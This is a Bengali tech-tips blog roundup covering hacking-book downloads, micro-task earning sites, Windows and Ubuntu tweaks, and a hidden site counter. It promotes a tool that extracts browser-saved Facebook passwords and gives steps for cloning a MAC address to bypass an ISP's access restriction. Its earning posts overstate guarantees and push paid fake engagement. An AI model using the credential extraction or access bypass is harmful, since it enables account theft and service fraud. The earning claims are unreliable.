আসসালামু আলাইকুম, সবাইকে এই বৃষ্টিভেজা দিনের শুভেচ্ছা জানিয়ে টিউন শুরু করছি। কেমন আছেন? আশা করি ভাল আছেন। আজ আপনাদের জন্য নিয়ে এসেছি হ্যাকিং এর উপর লেখা একটি সিরিজ বই। সিরিজটি হল HACKING Exposed.

হ্যাকিং এক্সপোজ এর বইগুলো হল
Hacking Exposed: Linux – #0072127732
Hacking Exposed: Network Security, 6th Ed. –
Hacking Exposed: cisco
Hacking Exposed: malware and rootkits
Hacking Exposed: VoIP – #0072263644
Hacking Exposed: Web 2.0 – #0071494618
Hacking Exposed: Web Applications – #0072262990
Hacking Exposed: Windows, 3rd Ed. – #007149426X
Hacking Exposed: Wireless – #0072262583
ডাউনলোড লিংক
সবাইকে অনেক শুভেচ্ছা ও ধন্যবাদ জানিয়ে টিউন শেষ করছি। আল্লাহ হাফেজ…..

অনলাইনে ইনকাম করতে চাই

আমার মতো অনেকেই একবুক আশা নিয়ে অনলাইনে ইনকাম করতে চাই। তারা প্রবল উৎসাহ নিয়ে আসে এবং তার চাইতে বেশি হতাশ হয়ে প্রস্থান করে। তাদের ধারনা হইয়ে যাই অনলাইন ইনকাম জিনিশটা হই ভুয়া নয়ত অনেক বেশি যারা জানে তাদের জন্য। আমার মতো ছা পোষারা শুধু অন্যদের আনন্দে শামিল হইতে পারে । নিজের আনন্দ অন্যদের সাথে বাটতে পারে না । সেইসব ভাইদের উৎসাহ দেওয়ার জন্যই আজকে আমার টিউন ।

আমিও আপনাদের মতই একজন ( যারা নিম্ন শ্রেনির টিউনার তাদের কথা বলছি ) । আমি ২ বচ্ছর আগেও জানতাম না কম্পিউটার জিনশটা কি । আমার প্রতিটা বন্ধুর ঘরে কম্পিউটার থাক্লেও আমি কখন ধরে দেখি নাই । আমি সাইবার কাফে তে গিয়ে নেট ব্রাউজ করতাম । কেও জানত না আমি কম্পিউটার কিছুটা হইলেও বুযতে পারি । ( কার থেকে কিছু চাইতাম না মনে হত যদি হাসির পাত্র হইয়ে যাই ) । যাই হোক এইসব প্যাঁচাল বাদ দেই । আমি কি করসি না করসি এইগুলা পড়ার জন্য নিশ্চয়ই আপনারা এইখানে আসেন নাই ।

যারা অনলাইনে ইনকাম করতে চাচ্ছেন কিন্তু পারতেসেন না তাদের জন্য আজকে একটা সাইট আমি বলবো । ১০০% গ্যারান্টিলা সাইট । মাইক্র সাইট গুলুর মতো । এই সাইট এ অনেক কাজ আছে জা আপনি সারাদিন বসে করলেও শেষ হবে না । আমি নিচে দিলাম

সাইটের নাম ঃ www.shorttask.com


কাজের ধরন ঃ মাইক্র সাইট গুলুর মতো ( facebook signup, google +1 vote , download , bookmarking , review writting, sign up , youtube sign up, like click , youtube subscription etc.)

কাজগুলু কেমন ঃ একজন স্টারটার এর জন্য একদম সহজ কাজ ।

কিভাবে হবে ঃ আপনি কাজ গ্রহন করার পর আপনার সময় সুরু হবে এবং নির্দিষ্ট সময় এর মধ্য কাজতি শেষ করতে হবে । নইত বাতিল বলে গণ্য হবে । ( টিপসসঃ আগে কাজটি শেষ করুন তারপর সাবমিট করুন )

আয় এর ধরন ঃ আপনি এইখানে .০১ সেন্ট থেকে শুরু করে ২ ডলার পর্যন্ত কাজ পাবেন । প্রতিদিন আপনি ১ ঘন্তা সময় বের করে কাজ করুন দেখবেন পনেরদিন এর মাথাই আপনি আপনার কাঙ্কখিত লক্ষ্য যেতে পারবেন ।( আমার গাফলতির জন্য আমার থেকে ২৫ দিন সময় লেগেছে )

পেমেন্ত মেথড ঃ পেপাল এর মাধ্যমে আপনি আপনার আয় বুঝে নিবেন । ১০ ডলার হতে হবে । ইনস্ট্যান্ট পেমেন্ট । পেপাল ভেরিফায় হইতে হবে না ।

সুবিধা ঃ মাইক্র সাইট গুলুর থেকে এর একটি আলাদা ব্যাপার আছে। তাহল এর কোন সাকসেস রেশিও নাই । তাই কাজে ভুল হলেও কুনো পানিশমেন্ট নাই ।

অসুবিধাঃ এখনো পাই নাই পাইলে আমাকে বলবেন ।

রেজিস্ট্রেশান পদ্ধতিঃ এই সাইট টিতে রেজঃ করার সময় আপনারা দেখবেন লেখা আছে SOLVER / SEEKER . যারা কাজ করতে চান তারা SOLVER এ ক্লিক করে রেজঃ করুন । SEEKER অপশন টি যারা কাজ জমা দিতে চাই তাদের জন্য ।

আসবে এমন ঃ

রেজিস্ত্রাসন এর পর দেখবেন এমন একটি চিত্র ।

দেখুন প্রথম পেজেই আপনার ব্যাল্যান্স দেখচ্ছে । কাজ করার জন্য ক্লিক করুন TASK >ALL TASKS. তারপর চিত্র টা হবে এমন

খেয়াল করুন উপরে কাজ এর পরিমান ৪০০ এর উপরে দেখাচ্ছে ।এতগুলু কাজ করতে কতদিন লাগবে একবার চিন্তা করুন !!!!!

আপনি আপনার কাজ করার পর কাজ গুলু বাতিল / ঝুলিয়ে রেখেছে কিনা / গ্রহন হইয়েছে কিনা দেখতে চাইলে ক্লিক করুন YOUR ACCOUNT > DASHBOARD

আমার পেমেন্ট প্রুফ । রিকুএসট পাঠানো হইয়েছিল ১৩ তারিখ । আমি ১৪ তারিখে পেয়েছি ।

আশা করি নতুন যারা তাদের অনেক কাজে লাগবে ।

*** আয় করুন । এবং আয় করার প্রধান শরতই হচ্ছে আপনাকে ধৈর্য শিল হতে হবে । কই এক বার যদি আপনার কাজ বাতিল হইও আপনি চেষ্টা করে যান সফলতা আসবে নিশ্চিত । ধন্যবাদ সাথে থাকার জন্য ***

এবার অনলাইনে খুব সহজে টাকা আয় করুন। ১০০% নিশ্চিত

যারা Online এ ছোট ছোট এবং সহজ কাজ করে টাকা আয় করতে চান তাদের জন্য আমার আজকের এই টিউন।
সাইটটির নাম হল minijobz

অনেকেই হয়ত জানেন এই সাইটির খোঁজ।
আসুন দেখে এবং জেনে নেই সাইটটি সম্পর্কেঃ

এদের মধ্যে minijobz সাইটটি আমার কছে অসাধারন লেগেছে ।

সাইটটির সুবিধাঃ

১। কাজ খুবই সহজ।

২। Signup করার সাথে সাথে ১ ডলার ফ্রী।

৩। মিনিমাম ৫ ডলার হলে পে আউট করা যায়।

৪। রেফারেল সুবিধা।

৫। Alertpay and paypal সাপোর্ট করে।

***minijobz এ রেজিস্ট্রিসন করতে এখানে ক্লিক করুন।

এই সাইটটি থেকে আমি সত্যিকারের টাকা পেয়েছি ।

তো আর দেরি কেন এখনি শুরু করে দিন ইনকাম।

আজ এ পর্যন্তই। বিদায়।

বুধবার, ১৬ নভেম্বর, ২০১১

প্রিয় বন্ধুরা কম্পিউটার ব্যবহারের ক্ষেত্রে প্রায় আমাদের কম্পিউটারকে নির্দিষ্ট সময়ে বন্ধ করার প্রয়োজন হয়ে উঠে। যেমন ধরুন আপনি ইন্টারনেট থেকে কিছু ডাউনলোড দিয়েছেন অথবা কম্পিউটার ভাইরাস স্ক্যান দিয়েছেন, যা ডাউনলোড বা স্ক্যান করতে ৩০ মিনিট সময়ের প্রয়োজন। কিন্তু ৩০ মিনিট সময় প্রর্যন্ত কম্পিউটারের সাথে থাকা আপনার সম্ভব হচ্ছে না। অথবা আপনাকে জরুরী কোন কাজে বাহিরে যেতে হচ্ছে। এমতবস্থায় আপনি ইচ্ছে করলে আপনার কম্পিউটারকে নির্দিষ্ট সময় বন্ধ করার জন্য সময় নির্ধারন করে চলে যেতে পারেন, যাতে করে কম্পিউটারটি নির্দিষ্ট সময়ে বন্ধ হয়ে যায়।

এই কাজটি করার জন্য অনেকেই নানান ধরনের সফটওয়্যার ব্যবহার করে থাকেন। তবে এই ট্রিকসটির মাধ্যমে কোন সফটওয়্যার ব্যবহার না করেই খুব সহজেই কম্পিউটার Shutdown অথবা Restart করতে পারবেন।

সেটিংসটি করার জন্য নিচের ধাপগুলো লক্ষ্য করুন।
Desktop এর খালি যায়গায Right click করে New থেকে Shortcut click করুন।

Text box এ SHUTDOWN -s -t 30 টাইপ করে Next>Finish click করুন।



Desktop এ দেখুন Shutdown.exe নামে একটি আইকন তৈরী হয়েছে।



আইকনটিতে ডাবল ক্লিক করে দেখুন System Shutdown নামে একটি Box দেখা যাচেছ এবং ৩০ সেকেন্ড হওয়ার সাথে সাথে আপনার কম্পিউটারটি Shutdown হয়ে যাবে।

উলেখ্য যে, আপনি ৩০ সেকেন্ড এর বেশি সময় নির্ধারন করতে চাইলে SHUTDOWN -s –t এর পরে আপনার প্রয়োজন অনুযায়ী টাইম সেট করতে পারবেন। যেমন 20 মিনিটের জন্য 1200 second টাইপ করে দিতে পারেন।

Restart করার জন্য SHUTDOWN -s -t 30 “s” এর পরিবর্তে “r” টাইপ করে দিলেই নির্দিষ্ট সময়ে পিসি Restart হবে।

গুরুত্তপূর্ণ প্রোগ্রাম/ফাইল/ফোল্ডার গুলো run দিয়ে একসেস করুন

কিছু কিওয়ার্ড দিয়ে স্টার্ট মেনুর Run থেকে গুরুত্তপুর্ণ সব প্রোগ্রামেই যে একসেস করা যায় তা সবারই জানা। কিন্তু আপনার প্রয়োজনীয় প্রোগ্রাম বা ফাইল বা ফোল্ডারটিতে সহজে একসেস করবেন কিভাবে? গুরুত্তপূর্ণ প্রোগ্রাম বা ফাইল বা ফোল্ডারটিতে Run দিয়ে সহজে একসেস করতে হলে আপনাকে যা করতে হবে তা হলো_

১। Windows 2000 বা XP ব্যবহারকারীরা প্রয়োজনীয় প্রোগ্রাম বা ফাইল বা ফোল্ডারটি কপি করে আপনার যে ড্রাইভে windows ইন্সটল করা আছে সেই ড্রাইভে windows বা winnt ফোল্ডারে (x:\windows বা x:\windows\winNT Drive) সর্টকাট (shortcut) পেস্ট করুন। আর Windows 98 বা ME ব্যবহারকারীরা x:\windows\Command\Folder ডেস্টিনেশনে সর্টকাটটি পেস্ট করুন।
২। সর্টকাটটি (shortcut) রিনেম্ করে একটি সর্টকাট নাম দিন, যা Run দিয়ে একসেস করার কিওয়ার্ড।
৩। কিওয়ার্ডটি ব্যবহার করেই আপনি Run থেকে সহজে একসেস করতে পারবে।

(সংগৃহিত)

speed up your ntfs file system


আমার টিউনে আপনাদের সকলকে স্বাগতম।আশা করি আল্লাহর রহমতে সকলে ভাল আছেন।আমি আপনাদেরকে আজ যে টিউনটি উপহার দেব আশা করি তা আপনাদের কাজে আসবে।

১/ ক্লিক স্টার্ট বাটন এবং Run

২/ টাইপ (regedit) and ok

৩/ Go to:

Run then type regedit:-
then Go to
HKEY_LOCAL_MACHINE>SYSTEM>CurrentControlSet>Control>FileSystem



৪/ খোজ করুন (Find item) NtfsDisableLastAccessUpdate and give her a Value 00000001. যদি এইটা না থাকে তাহলে এক্ষুনি বানিয়ে নিন প্রথমে “ Filesystem ” এর উপর right বাটন click করুন তারপর New —Dword –এ click করুন এবং নাম দিন এই নামে “NtfsDisableLastAccessUpdate” এবং Value তে 00000001 দিন . Base এ দেখুন Hexadecim ক্লিক করুন —



৫/কম্পিউটার Restart দিন …

ধন্যবাদ …

উবুন্টুতে ইন্টারনেট কনফিগার করা

উবুন্টুতে ইন্টারনেট কনফিগার করা যায় দুই ভাবে।
গ্রাফিক্যাল কনফিগারেশনঃ
১। System > Preferences > Network Connections
২। Wired হতে Add বাটনে ক্লিক। Connection Name এ একটা নাম দিতে হবে (যেমন eth1)
৩। IPv4 Settings এর Method হতে Manual সিলেক্ট করতে হবে।
৪। এবার IP দেবার জন্য Add বাটনে ক্লিক করতে হবে।IP Address, Netmask, Gateway এবং DNS দিতে হবে।
৫। উবুন্টু চালু হবার পর অটোমেটিক নেটওয়ার্ক চালু হবার জন্যConnect automatically তে টিক দিতে হবে।
৬। Apply বাটনে ক্লিক করতে হবে।
টারমিনাল কনফিগারেশনঃ
১। Applications > Accessories > Terminal (অথবা Alt+F2 > gnome-terminal > Run)
২। sudo gedit /etc/network/interfaces
এবার কোন কিছু না মুছে নিছে লিখুন
auto eth1
iface eth1 inet static
address your_ip_address
netmask your_subnet_mask
gateway your_gateway
এখানে আপনার ip address, subnet mask and gateway দেবার পর save করুন।
৩। Terminal এ আবার লিখুন
sudo gedit /etc/resolv.conf
nameserver dns1_address
nameserver dns2_address (যদি একাধিক dns address থাকে)
save করে বের হয়ে আসুন। আপনার নেটওয়ার্ক কনফিগার করা শেষ। এখন আপনি Internet ব্যবহার করতে পারবেন।

সহজে রিকভার করুন আপনার ফেসবুক এর হারিয়ে যাও পাসওয়াড।


আজ আপনাদের জন্য নিয়ে আসলাম একটি ছোট সফটওয়্যার যার নাম Facebook Password Decryptor এই সফটওয়্যার দ্বারা আপুনি সহজে আপনার কম্পিউটার এর ব্রাউজারে সংরক্ষিত ফেসবুক এর পাসওয়াড রিকভার করতে পারবেন। সফটওয়্যার টি সাইজ অনেক ছোট মাএ ৩.যাদের প্রয়োজন তারা এখান থেকে ডাউনলোড করতে পারেন।

Facebook Password Decryptor

Facebook Password Decryptor showing the recovered Facebook password accounts from various applications.৫ এমবি।এটি পোটাবল তাই ইন্সটল করতে হবে না।

কম্পিউটার shutdown করুন মাত্র ২ সেকেন্ডে ”xp” user দের জন্

প্রথমে Ctrl+Alt+Delete key চাপুন তাহলে Windows Task Manager নামে একটি ডায়ালগ বক্স আসবে । সেখান থেকে সবার উপরে দেখুন shutdown লেখার উপরে ক্লিক করলে Standby, Turn Off , Restart , Log Off , Switch User থেকে Ctrl চেপে ধরে Turn Off সিলেক্ট করলেই কম্পিউটার মাত্র ২ সেকেন্ডে Shutdown হয়ে যাবে । ধন্যবাদ সবাইকে

নামানোর আগেই দেখুন ভাইরাস আছে কি নেই

আসসালামু আলাইকুম।আশা করি সবাই ভাল আছেন।
আজ আমি আপনাদের ভাইরাস সম্বন্ধে বলবো।আমরা সবাই কম বেশি ইন্টারনেট ব্যবহার করি।ইন্টারনেট ব্যবহার করলে বিভিন্ন সফটওয়্যার বা ফাইল কম্পিউটারে নামিয়ে (ডাউনলোড)নিতে হয়।কিন্তু নামানো্র পর যদি দেখা যায় সফটওয়্যার বা ফাইলটিতে ভাইরাস আছে,তাহলে কেমন লাগে!সফটওয়্যার নামানো্র আগেই যদি ২২টি জনপ্রিয় Antivirus সফটওয়্যার দিয়ে পরীক্ষা করে নেওয়া যেত,তবে কেমন হতো!এ জন্য যে সফটওয়্যার বা ফাইল নামাতে চান সেটির ওয়েব ঠিকানা কপি করে http://scanner.novirusthanks.org ঠিকানার ওয়েবসাইটে যান।এবারে Scan Web Address এ ক্লিক করে লিঙ্কটি paste করে Submit Addressএ ক্লিক করুন।কিছুক্ষণের মাঝে ২২টি Antivirus সফটওয়্যার ওই ঠিকানার সফটওয়্যার Scan করে ফলাফল দিবে।বোঝা যাবে সেটিতে কোনো ভাইরাস আছে কি নেই।এখানে ওই সাইটের ঠিকানা Paste করে Scan করলেও ফলাফল পাওয়া যাবে।আর যদি কম্পিউটারের কোনো ফাইল (সব্বোচ ২০ মেগাবাইট) Scan করতে চান তাহলে Scan File থেকে Browse বাটনে ক্লিক করে কম্পিউটারের ফাইলটি নির্বাচন করে Submit File করলেই হবে।
সবাই ভাল থাকবেন।

নিজে নিজে mac এড্রেস পরিবর্তন করুন

অনেক ইনন্টারনেট সংযোগ প্রদানকারী প্রতিষ্ঠান MAC এড্রেস ভিত্তিক সিকিউরিটি প্রয়োগ করে। ফলে যে পিসির জন্য ইন্টারনেট সংযোগ বরাদ্দ করা হয়েছে সেটি ছাড়া অন্য পিসিতে কানেকশনটি কাজ করে না। কিন্তু আপনি যদি অন্য পিসিটির MAC এড্রেস ও একই করে দিতে পারেন তাহলে কাজ করবে। প্রথমে জেনে নিই MAC এড্রেস কত সেটা জানবেন কিভাবে? Start Menu -> Run এ cmd লিখে এন্টার দিন। কমান্ড প্রম্পট চালু হবে। ipconfig/all লিখে এন্টার দিন। একটা লাইনে আপনি নিচের মত দেখতে পাবেন:
Physical Address. . . . . . . . . : 00-01-6B-9E-AE-0C

এখানে 00-01-6B-9E-AE-0C হচ্ছে MAC এড্রেস(আপনার পিসিতে অন্য সংখ্যা দেখতে পাবেন)। এবার দেখি MAC এড্রেস কিভাবে পরিবর্তন করবেন:
১. ডেস্কটপে My Network Places এ রাইট বাটন ক্লিক করে Properties এ ক্লিক করুন।
২. Network Connection ফোল্ডার খুলবে। Local Area Connection এ রাইট বাটন ক্লিক করে Properties এ ক্লিক করুন। Local Area Connection Properties খুলবে।
৩. General ট্যাবে Connect using: এর সাথে দেখবেন কোন কোম্পানীর ল্যান কার্ড তা দেখাচ্ছে। পাশের Configure বাটনে ক্লিক করুন।
৪. Advanced ট্যাবে ক্লিক করুন। Property: এর অধীনে Locally Administered Address এ ক্লিক করুন। ডান পাশে Value এর রেডিও বাটনে ক্লিক করে অন্য MAC এড্রেস দিয়ে OK দিন। এখানে খেয়াল রাখতে হবে MAC এড্রেস টাইপ করার সময় “-” চিহ্নগুলো বাদ দিতে হবে। যেমন:- 00016B9EAE0C।

এবার আগের প্রসঙ্গে ফিরে যাই। যে পিসির জন্য ইন্টারনেট সংযোগ নেওয়া হয়েছে তার MAC এড্রেস জেনে নিন। সেই MAC এড্রেসটা অন্য পিসিটাতে সেট করতে হবে। তাহলে দেখবেন অন্য পিসিটাতে ও ব্রাউজ হচ্ছে।

বার বার সিরিয়ল কী প্রয়োগ না করে এম এস অফিস ২০৩ সেটআপ :

আমরা যারা নিয়মিত মাইক্রোসফট অফিস ব্যবহার করি তাদের এই টিটোরিয়ালটি কাজে আসবে। কমপিউটারে নতুন করে অফিস সেটআপ দিতে হলে সব সময় আমাদেরকে সিরিয়াল কী, ইউজার নেম ও কম্পানি নেম দিতে হয়। আপনি যদি একটু ট্রিকস খাটান তাহলে আর প্রতিবার এই তথ্য গুলো দিতে হবে না এবং কষ্ট করে সিরিয়াল কী টাইপ করতে হবে না। আসুন দেখি কি করতে হবেঃ

অফিস সফটওয়ারের ভিতর \FILES\SETUP সাবফোল্ডারের ভিতর হতে setup.ini ফাইলটি খুজে বের করুন। নোটপ্যাড দিয়ে ফাইলটি খুললে নিচের মতো ইনফরমেশন দেখাবেঃ
[Options]
; The option section is used for specifying individual Installer Properties.
;USERNAME=Customer
;COMPANYNAME=my company
;INSTALLLOCATION=C:\Program Files\MyApp

এখানে ইউজারনেম , কম্পানি নেমের আগে সেমিকোলোন ( উঠিয়ে দিন। কাস্টোমার এর জায়গায় আপনার নাম, মাই-কম্পানির জায়গায় আপনার নিজের পছন্দের নাম দিন। ইচ্ছে করলে ইন্সটলেশন লোকেশন চেঞ্জ করে দিতে পারেন তাহলে প্রতি বার নির্দিষ্ট লোকেশনে অফিস সেটআপ হবে। লোকেশনের পরে নিচের লাইনটি লিখুনঃ

PIDKEY=ABCDEFGHIJKLMNOPQRSTUVWXY
এখানে PIDKEY পাশে = চিহ্ন দিয়ে A থেকে Y পর্যন্ত লেটারের জায়গায় আপনার সিডির সাথে দেয়া সিরিয়াল কী টা কোন হাইফেন বা স্পেস ছাড়া লিখুন। সব কিছু ঠিক ঠাক থাকলে কনফিগারেশন টা নিচের মতো দেখাবেঃ

[Options]
; The option section is used for specifying individual Installer Properties.
USERNAME=RONY
COMPANYNAME=RockingZone
;INSTALLLOCATION=C:\Program Files\MyApp
PIDKEY=ABCDEFGHIJKLMNOPQRSTUVWXY

ফাইলটি সেভ করে বের হয়ে আসুন। এখন থেকে আপনাকে আর এই সব তথ্য বার বার টাইপ করতে হবে না। ইচ্ছে করলে চেঞ্জ করা ফাইল সহ পুরো অফিসটি সিডিতে বার্ন করে ব্যবহার করতে পারেন।

অফিস২০০৩ ছাড়া অন্যান্য অফিসেও কাজ করতে পারে। তবে setup.ini ফাইলটি ব্যাকআপ রেখে কাজ করুন।

গ্রামীণফোন মডেমের একটা সমস্যা ও তার সমাধান

আমি যেদিন প্রথম জিপির মডেমটা দেখলাম সেদিন মডেমটা মোটামুটি ভালো লাগলো কিন্তু মডেমটির একটা জিনিষ আমার খুবই অপছন্দ হয়েছে। আর সেটা হলো অটোমেটিক গ্রামীনফোনের ওয়েব সাইটে ঢোকা। মানে যখন মডেমটা পিসিতে লাগিয়ে কানেক্ট বাটনে ক্লীক করলেই কানেক্ট হওয়ার পর অটোমেটিক internet.grameenphone.com ওপেন হয়। যতবারই ইন্টারনেট কানেক্ট করবেন ততবারই ঐ ওয়েব সাইটা চালু হয়। এটা একটা যন্ত্রনার চেয়ে কম নয়। আপনারা ইচ্ছা করলে এই ঝামেলা থেকে খুব সহজেই মুক্তি পেতে পারেন।

এজন্য নিচের ধাপগুলো অনুসরণ করুনঃ

১. জিপি মডেম সফটওয়্যারটি যেখানে সেটআপ দিয়েছেন সেখানে যান। সাধারণত জিপি মডেম C:\Program Files\grameenphone internet এ সেটআপ হয়।
২. সেখানে SysSetting.xml নামে একটা ফাইল দেখতে পাবেন।
৩. ফাইলটি যেহেতু xml ফরমেটের তাই খেয়াল রাখবেন ফাইলটি এডিট করার সময় কোন ভুল হলে আপনার সফটওয়্যারটিই নষ্ট হয়ে যাবে। তাই সতকর্তার জন্য ফাইলটির একটি ব্যাকআপ রাখুন।
৪. এবার ফাইলটি নোটপ্যাডের সাহায্যে চালু করুন।
৫. এখন http://internet.grameenphone.com লাইনটি খুজে বের করুন।

নিচের ছবিটি দেখুনঃ

৬. http://internet.grameenphone.com লিংটি মুছে দিন।
৭. তারপর ফাইলটি সেভ করুন।

অথবা
নিচের পদ্ধতিটাও ব্যবহার করে এই কাজটি করতে পারেনঃ

১. জিপির সফটওয়্যারটি চালু করুন।
২. Tools থেকে Options এ যান।
৩. General Tab এ Startup যান।
৪. সেখানে Launch internet.grameenphone.com when connect to internet থেকে টিক mark টি তুলে দিন।
৫. ব্যাস কাজ শেষ।

কাজে লাগলে বা কোন সমস্যা হলে কমেন্টস করতে ভুলবেন না যেন।

শুক্রবার, ১১ নভেম্বর, ২০১১

আপনার সাইট/ব্লগে ব্যবহার করুন হিডেন ভিজিটর কাউন্টার

আমরা যারা কাজে বা অকাজে সাইট বা ব্লগ তৈরী করি তারা সবসময় সাইটের ভিজিটর দেখতে চাই আর জন্য আমরা সাইটে কাউন্টার ব্যবহার করি।কিন্তু সাইটে কাউন্টার নতুন সাইটের জন্য অনেক সময় ভিজিটর কমিয়ে দেয় ।কারণ কোন ভিজিটর যদি দেখে সাইটে ভিজিটর কম তাহলে সাইটটি যতই ভাল হোক তার সাইটের ব্যাপারে একটি বিরুপ ধারণা হবে ।আবার অধিকাংশ কাউন্টার দিয়ে সব কিছু ডিটেইলস জানা সম্বব নয় যেমন সাধারণ কাউন্টারে আপনার সাইটের ভিজিটরদের মাঝৈ কত শতাংশ সার্চ দিয়ে এসেছৈ কত শতাংশ সরাসরি আর কত শতাংশ লিংক হতে আবার ভিজিটর বৃদ্দির হার মোট পেজ ভিউ ,পেইজ ভিউয়ের হার এসব Advanced ফিচার থাকেনা আবার ডিটেইল সবার জন্য উন্মুত্ত করে দেয়াটাও বোকামী।আর এজন্য সবচেয়ে ভাল আর নিরাপদ উপায় হল সাইটে বা ব্লগে হাইডেন কাউন্টার ব্যবহার করা।আজ আমি আপনাদের সামনে Histats নামের হাইডেন ভিজিটর ট্রাকার সাইটটি নিয়ে আলোচনা করব।

প্রথমে চলুন Histats ফিচারগুলো এক নজরে দেখে নেই
::আপনি ইচ্ছা করলে এই কাউন্টারটি হাইড করে রাখতে পারবেন।আপনি ছাড়া আর কেউ দেখতে পারবে না।
::আপনার সাইটের প্রতিদিনের ভিজিটর, মোট ভিজিটর ,অনলাইনে কতজন আছে এবং ভিজিটরের লোকেশন দেখতে পাবেন।
::ভিজিটররা কিভাবে আপনার সাইটে কিভাবে এসেছে যেমন সার্চ ইন্জিন ব্যবহার করে এসেছে না সরাসরি এসেছে তা জনতে পারবেন।
::একজন ভিজিটর কতক্ষন আপনার সাইটে ছিল কতটি পেজ দেখেছে তাও দেখতে পারবেন।
এছাড়া আরও অনেক ফিচর রয়েছে যা আপনারা ব্যবহার করলেই জানতে পারবেন।

তাহলে চলুন কথা না বাড়িয়ে কাজ শুরু করি। প্রথমে এখানে ক্লিক করে Histats যান তারপর রেজিষ্টেশন এ ক্লিক করে রেজিষ্টেশন শেষ করুন ।তবে রেজিষ্টেশন করার সময় একদম নিচের অংশে NOT public stats এর অপশনটি মার্ক করতে ভুলবেন না। এবার আপনাকে কোড দেয়া হবে কোডটি আপনার সাইটে কপি করে পেস্ট করে দিন তাহলেই আপনার কাজ শেষ।পরবর্তীতে আপনি Histats সাইটে এ লগিন করে আপনার সাইটের সব তথ্য দেখতে পারবেন। আর যারা ব্লগার ব্যবহার করেন তারা Layout এ ক্লিক করে Add a Gadget ক্লিক করে কোডটুকু পেস্ট করে দিন ব্যাস হয়ে গেল। আর কোন সমস্যা হলে বা কিছূ জানতে মন্তব্য করুন।

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More